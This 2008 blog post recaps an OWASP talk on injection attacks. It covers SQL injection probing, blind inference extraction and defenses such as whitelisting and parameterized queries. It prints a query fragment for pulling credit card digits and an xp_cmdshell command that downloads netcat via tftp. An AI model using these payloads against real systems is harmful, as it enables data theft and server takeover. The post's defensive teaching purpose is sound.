June OWASP – Injection Attacks

JP Sklenka’s posse from Cintas showed up at today’s OWASP event at the Citi offices in Blue Ash.  Cintas had four people there!  Kudos to them for taking visible steps towards application security.  I also ran into Russ McMahon from UC.  Wayne Browning was in town today and attended part of the event.  And it was great running into Marco and AllisonJames Walden, Ph.D. and assistant professor at NKU did a fabulous job with application injection attacks.  Frankly, I expected a run-of-the-mill SQL injection talk.  James took it deep and had me engaged for the entire hour.

I believe we’ll have a link to the presentation once it’s posted.  Here is a quick overview of some of the high points. Injection attacks happen when your code performs string concatenation while missing the fact that illegal characters have been placed in the user-submitted string.  Generally, an attacker extends the intended SQL to perform multiple database calls resulting in a loss or leaking of data or data manipulation.  Although SQL is the most often injection type, any string concatenation is vulnerable to an injection attack.  You’ll need to consider interactions with a shell, scripting environments (esp. where an eval( ) function is available), file, XML, XPath, LDAP, and other environments in order to plan for and thwart attack vectors.

How do you know if you have a SQL injection problem?  While not a thorough analysis, if you submit a single quote in a field and get an error, then you probably have an issue.  If you then submit a double quote, and your error goes away, yep, you do have a problem.

Injection issues can manifest themselves in any database statement.  Although SELECT statements are the most common exploit, UPDATE and other statements are also vulnerable.  Testing vulnerabilities generally involves truncating the existing SQL and adding a parameter that always evaluates to true, i.e. 1=1.  Be careful testing an update vulnerability and make sure you add your tests to the SET clause rather than the WHERE clause because a 1=1 in the WHERE will modify the data for every row.  Hmmm…I guess that requires the warning to only test on test databases.

James also took some time to detail inference attacks where an attacker picks apart your database piece by piece, step by step.  For instance after figuring out which table contains credit card numbers, an attacker could insert SQL code like this to grab one digit of a number at a time:

substring( SELECT TOP 1 number from CreditCard), 1, 1) = 1

So make sure you log all database activity so that your security tripwires would warn you when, say, the CreditCard table has been accessed 10 million times today when your business has only had 8 thousand transactions.

SQL Server allows extended procedures which can give an exploiter authority to run shell commands and take over the server itself.  A command might look something like this:

exec master..xp_cmdshell ‘tftp 192.168.1.1 GET mc.exe c:\nc.exe’

Once an attacker owns your server and can upload executable code at will, they can install backdoor access and cover their tracks so that you never know they got in.

The CORE IMPACT toolkit, used to test vulnerabilities, can be used to generate attacks.  And it comes with a money-back guarantee and 1 year of support 🙂

At the very least, make sure your string-building routines whitelist validate all input, meaning that before any user input makes it to the database you’ve scrubbed it against only what is allowed, and if it’s not allowed you don’t use it and return an error to the user.  Whitelist and parameterized queries should keep you fairly safe.  Understand, though, that you must stay vigilant, as your potential attackers are more creative than you are disciplined.

Andy

Advertisements

~ by Andy on June 25, 2008.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
%d bloggers like this: